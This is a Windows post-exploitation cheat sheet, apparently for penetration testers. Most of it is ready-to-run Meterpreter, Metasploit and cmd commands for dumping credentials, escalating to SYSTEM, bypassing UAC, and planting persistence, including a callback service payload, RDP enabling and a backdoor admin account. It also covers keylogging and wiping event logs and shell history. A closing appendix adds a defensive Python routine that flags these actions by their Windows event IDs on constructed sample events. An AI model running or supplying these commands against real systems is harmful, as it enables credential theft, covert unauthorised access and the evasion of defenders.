# Windows Post-Exploitation

## System Enumeration

| Command | Description |
|---|---|
| sysinfo | OS, hostname, architecture (Meterpreter). |
| getuid | Current user (Meterpreter). |
| getpid | Current process ID. |
| ps | List running processes. |
| migrate <PID> | Migrate to another process for stability. |
| ipconfig | Network configuration. |
| arp | ARP table - discover local network hosts. |
### From Shell (cmd/PowerShell)

| Command | Description |
|---|---|
| whoami | Current user. |
| whoami /priv | Current user privileges. |
| whoami /groups | Current user group memberships. |
| systeminfo | OS version, patches, network config, domain. |
| net user | List local users. |
| net user <username> | Details for a specific user. |
| net localgroup | List all local groups. |
| net localgroup administrators | Members of the Administrators group. |
| ipconfig /all | Full network config including DNS. |
| arp -a | ARP table. |
| netstat -ano | Active connections with PIDs. |
| tasklist | Running processes. |
| sc query | List all services. |
| wmic os get Caption,Version,BuildNumber | OS version details. |
## Credential Dumping

```
# Meterpreter - Kiwi extension
load kiwi
creds_all           # All credentials at once
lsa_dump_sam        # Local account NTLM hashes
lsa_dump_secrets    # LSA secrets (DefaultPassword, service accounts)
```

```
# MSF post module
use post/windows/gather/hashdump
set SESSION <id>
run
```

```
# Search for passwords in config files
use post/windows/gather/credentials/credential_collector
set SESSION <id>
run
```

```
# Search unattend.xml and sysprep files from shell
dir /s /b C:\*unattend*.xml 2>nul
dir /s /b C:\*sysprep*.xml 2>nul
dir /s /b C:\*password*.txt 2>nul
```

## Privilege Escalation
### getsystem

```
meterpreter > getsystem
# Tries: named pipe impersonation, token duplication, etc.
```

### UAC Bypass

```
use exploit/windows/local/bypassuac_injection
set SESSION <id>
set TARGET Windows\ x64
run
```

### Token Impersonation

```
meterpreter > load incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"
meterpreter > rev2self   # Revert to original token
```

## Persistence
### Service-based Persistence

```
use exploit/windows/local/persistence_service
set SESSION <id>
set LHOST <kali_IP>
set LPORT <port>
run
# Save the RC cleanup file path shown in output
```

### Enable RDP for Persistent Access

```
# From Meterpreter shell
run post/windows/manage/enable_rdp
# or manually:
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall add rule name="RDP" protocol=TCP dir=in localport=3389 action=allow
```

### Add a Local Admin User

```
net user hacker Password123! /add
net localgroup administrators hacker /add
net localgroup "Remote Desktop Users" hacker /add
```

## Keylogging

```
meterpreter > keyscan_start
meterpreter > keyscan_dump
meterpreter > keyscan_stop
```

## Clearing Tracks
```
# Clear Windows Event Logs (Meterpreter)
clearev
# From cmd
wevtutil cl System
wevtutil cl Security
wevtutil cl Application
# Clear PowerShell history
del %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
```

## Post-Exploitation MSF Modules

| Module | Description |
|---|---|
| post/windows/gather/enum_logged_on_users | List logged-on users. |
| post/windows/gather/enum_shares | Enumerate network shares. |
| post/windows/gather/enum_applications | Installed applications. |
| post/windows/gather/credentials/credential_collector | Harvest stored credentials. |
| post/multi/recon/local_exploit_suggester | Suggest local privilege escalation exploits. |
| post/windows/manage/enable_rdp | Enable RDP. |
| post/windows/manage/persistence | Registry-based persistence. |
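Every action in the Persistence and Clearing Tracks sections above leaves a Windows event behind, which is what a blue team hunts for. The following is an added example, not part of the original cheat sheet: a small triage routine that maps those actions (local account creation, Administrators / Remote Desktop Users membership, a new service from a user-writable path, fDenyTSConnections set to 0, Security or System log cleared) to the event IDs Windows logs for them. The `SAMPLE_EVENTS` records and their field names are constructed and assume a flattened SIEM-style representation of Security, System and Sysmon events.

```python
# Constructed sample records (not real telemetry), flattened the way a SIEM
# would present Security, System and Sysmon events. The event IDs are the real
# Windows IDs for each action: 4720 user created, 4732 member added to a local
# group, 7045 service installed, Sysmon 13 registry value set, 1102 / 104
# Security / System log cleared. 4624 (logon) is a benign control that must
# not fire.
SAMPLE_EVENTS = [
    {"log": "Security", "id": 4720, "target": "hacker"},
    {"log": "Security", "id": 4732, "group_sid": "S-1-5-32-544", "member": "hacker"},
    {"log": "Security", "id": 4732, "group_sid": "S-1-5-32-555", "member": "hacker"},
    {"log": "System", "id": 7045, "service": "UpdaterSvc",
     "image": "C:\\Users\\Public\\u.exe"},
    {"log": "Sysmon", "id": 13, "details": "DWORD (0x00000000)",
     "target_object": "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\fDenyTSConnections"},
    {"log": "Security", "id": 1102, "subject": "hacker"},
    {"log": "System", "id": 104, "channel": "System"},
    {"log": "Security", "id": 4624, "target": "alice"},
]

# Well-known SIDs of the two groups the cheat sheet adds its user to.
PRIVILEGED_GROUPS = {"S-1-5-32-544": "Administrators", "S-1-5-32-555": "Remote Desktop Users"}
# Service binaries under these paths are unusual for legitimate installs.
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")


def triage_events(events: list[dict]) -> list[tuple[str, int, str]]:
    """Return one (rule, event_id, detail) tuple per event that matches a rule."""
    hits = []
    for e in events:
        log, eid = e["log"], e["id"]
        if log == "Security" and eid == 4720:
            hits.append(("local-account-created", eid, e["target"]))
        elif log == "Security" and eid == 4732 and e.get("group_sid") in PRIVILEGED_GROUPS:
            group = PRIVILEGED_GROUPS[e["group_sid"]]
            hits.append(("privileged-group-member-added", eid, f"{e['member']} -> {group}"))
        elif log == "System" and eid == 7045 and e.get("image", "").lower().startswith(USER_WRITABLE):
            hits.append(("service-installed-from-user-writable-path", eid, e["service"]))
        elif (log == "Sysmon" and eid == 13
              and e.get("target_object", "").lower().endswith("\\fdenytsconnections")
              and "0x00000000" in e.get("details", "")):
            hits.append(("rdp-enabled-via-registry", eid, e["target_object"]))
        elif (log == "Security" and eid == 1102) or (log == "System" and eid == 104):
            hits.append(("event-log-cleared", eid, e.get("channel", log)))
    return hits


if __name__ == "__main__":
    for rule, eid, detail in triage_events(SAMPLE_EVENTS):
        print(f"{rule:45} event {eid:<5} {detail}")
```

Because `clearev` and `wevtutil cl` themselves generate 1102 / 104, log clearing is one of the few attacker actions that cannot be hidden from a log collector that already forwarded the earlier events.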